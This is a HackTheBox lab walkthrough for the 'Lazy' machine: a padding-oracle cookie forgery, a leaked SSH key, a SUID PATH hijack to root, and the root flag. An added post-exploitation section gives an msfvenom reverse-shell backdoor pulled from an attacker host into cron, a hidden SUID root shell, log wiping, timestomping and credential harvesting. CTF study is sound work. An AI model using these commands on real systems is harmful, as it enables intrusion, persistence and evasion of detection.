HackTheBox Lazy

---

Machine Synopsis

Key Exploitation Techniques:

• Padding Oracle Attack (AES-CBC session cookie manipulation)
• SSH key discovery via admin panel access
• SSH authentication bypass (PubkeyAcceptedKeyTypes)
• SUID binary exploitation (PATH hijacking via unsafe external command execution)

Reconnaissance & Enumeration

Port Discovery

$ nmap -sC -sV -A 10.10.10.18
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))

Web Application Analysis

The website hosts a “CompanyDev” portal with login and registration functionality. SQL injection tests against the login form show no direct vulnerabilities.

# Test for SQL injection
$ sqlmap -r login_request.txt --batch
[CRITICAL] all tested parameters do not appear to be injectable.

Directory Enumeration

$ gobuster dir -u http://10.10.10.18 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php
/images               (Status: 301)
/index.php            (Status: 200)
/login.php            (Status: 200)
/register.php         (Status: 200)
/logout.php           (Status: 302)

Exploitation

Padding Oracle Discovery

Registration creates an auth cookie. Modifying this cookie triggers “incorrect padding” errors, indicating a Padding Oracle vulnerability.

Cookie Analysis:

• Normal cookie: IxYyntb34ugmMvdXexQbh28%2FZR4JGpPs
• Modified cookie: Results in padding error

Padding Oracle Attack

Cookie Decryption

# Decrypt existing auth cookie to understand format
$ padbuster http://10.10.10.18/index.php IxYyntb34ugmMvdXexQbh28%2FZR4JGpPs 8 -cookies auth=IxYyntb34ugmMvdXexQbh28%2FZR4JGpPs -encoding 0

[+] Decrypted value (ASCII): user=shiro

Admin Cookie Creation

# Encrypt new plaintext for admin access
$ padbuster http://10.10.10.18/index.php IxYyntb34ugmMvdXexQbh28%2FZR4JGpPs 8 -cookies auth=IxYyntb34ugmMvdXexQbh28%2FZR4JGpPs -encoding 0 -plaintext user=admin

[+] Encrypted value is: BAitGdYuupMjA3gl1aFoOwAAAAAAAAAA

Admin Panel Access

Replace the browser session cookie with BAitGdYuupMjA3gl1aFoOwAAAAAAAAAA to gain administrative access.

SSH Key Discovery

The admin dashboard contains a “My Key” link providing an RSA private key named mysshkeywithnamemitsos.

# Download SSH key
$ wget -O id_rsa http://10.10.10.18/mysshkeywithnamemitsos
$ chmod 600 id_rsa

SSH Authentication Bypass

# Initial connection fails due to signature algorithm mismatch
$ ssh -i id_rsa mitsos@10.10.10.18
sign_and_send_pubkey: no mutual signature supported

# Bypass by accepting ssh-rsa key types
$ ssh -i id_rsa mitsos@10.10.10.18 -o PubkeyAcceptedKeyTypes=+ssh-rsa
mitsos@LazyClown:~$

Privilege Escalation

SUID Binary Discovery

mitsos@LazyClown:~$ ls -la
-rwsrwsr-x 1 root   root   7303 May  3  2017 backup

Binary Analysis

mitsos@LazyClown:~$ ./backup 
root:$6$v1daFgo/$.7m9WXOoE4CKFdWvC.8A9aaQ334avEU8KHTmhjjGXMl0CTvZqRfNM5NO2/.7n2WtC58IUOMvLjHL0j4Os...

mitsos@LazyClown:~$ strings backup 
cat /etc/shadow

Vulnerability: The binary calls cat without full path, enabling PATH hijacking.

PATH Hijacking Exploitation

# Modify PATH to prioritize /tmp
mitsos@LazyClown:~$ export PATH=/tmp:$PATH

# Create malicious cat script
mitsos@LazyClown:/tmp$ cat > cat << 'EOF'
#!/bin/sh
/bin/sh
EOF
mitsos@LazyClown:/tmp$ chmod +x cat

# Execute SUID binary to trigger malicious cat
mitsos@LazyClown:~$ ./backup 
# whoami
root
# cat /root/root.txt
489332b5fb06c89a9618f082b1b107a2

Post-Exploitation Techniques

Persistence Methods

SSH Key Persistence

# Generate new SSH key pair
$ ssh-keygen -t rsa -b 4096 -f lazy_persistence

# Add public key to root authorized_keys
# echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQ..." >> /root/.ssh/authorized_keys
# chmod 600 /root/.ssh/authorized_keys

Cron Backdoor

# Create reverse shell payload
$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.6 LPORT=4444 -f elf -o backdoor
$ python3 -m http.server 80

# Download and install on target
# wget 10.10.14.6/backdoor -O /tmp/.update
# chmod +x /tmp/.update
# echo "*/10 * * * * /tmp/.update" >> /etc/crontab

SUID Backdoor Maintenance

# Create permanent SUID shell
# cp /bin/bash /tmp/.rootshell
# chmod 4755 /tmp/.rootshell

# Hide with file attributes
# chattr +i /tmp/.rootshell

Defense Evasion

Log Cleanup

# Clear authentication logs
# > /var/log/auth.log
# > /var/log/secure
# > /var/log/wtmp
# > /var/log/lastlog

# Clear command history
# > /root/.bash_history
# > /home/mitsos/.bash_history

Artifact Timestomping

# Match timestamps to system files
# touch -r /bin/ls /tmp/.rootshell
# touch -r /bin/cat /tmp/cat

Lateral Movement Preparation

Network Discovery

# Scan local network
# for i in {1..254}; do ping -c 1 -W 1 192.168.1.$i | grep "64 bytes" | cut -d" " -f4 | tr -d ":"; done

# Port enumeration
# nmap -sT -p- --min-rate 5000 192.168.1.0/24

Credential Harvesting

# Extract password hashes
# cat /etc/shadow > /tmp/shadow.txt

# Search for SSH keys
# find /home -name "*.pem" -o -name "id_*" 2>/dev/null

# Look for stored credentials
# grep -r "password\|pass" /home/*/.*config* 2>/dev/null

Service Enumeration

# List network services
# netstat -tlnp

# Check for running databases
# ps aux | grep -E "(mysql|postgres|mongo)"

# Examine cron jobs
# cat /etc/crontab
# ls -la /etc/cron.*/*

Alternative Exploitation Methods

Manual Padding Oracle

# Manual cookie manipulation for testing
$ python3 -c "
import requests
import base64

# Test various padding scenarios
cookie = 'IxYyntb34ugmMvdXexQbh28%2FZR4JGpPs'
response = requests.get('http://10.10.10.18/index.php', cookies={'auth': cookie + 'A'})
print('Padding error detected' if 'padding' in response.text else 'No error')
"

Alternative SSH Access

# Try different SSH configurations
$ ssh -i id_rsa mitsos@10.10.10.18 -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null

Alternative Privilege Escalation

LinPEAS Enumeration

# Transfer and run LinPEAS
mitsos@LazyClown:/tmp$ wget 10.10.14.6/linpeas.sh
mitsos@LazyClown:/tmp$ chmod +x linpeas.sh
mitsos@LazyClown:/tmp$ ./linpeas.sh

Kernel Exploitation

# Check kernel version
mitsos@LazyClown:/tmp$ uname -a
Linux LazyClown 4.4.0-31-generic #50-Ubuntu SMP Wed Jul 13 00:07:12 UTC 2016 x86_64

# Search for applicable exploits
$ searchsploit linux kernel 4.4 | grep -i privilege

Docker Escape (if applicable)

# Check for Docker environment
mitsos@LazyClown:/tmp$ ls -la /.dockerenv 2>/dev/null && echo "Docker detected"

# Check for privileged containers
mitsos@LazyClown:/tmp$ cat /proc/self/status | grep -E "(CapInh|CapPrm|CapEff)"

---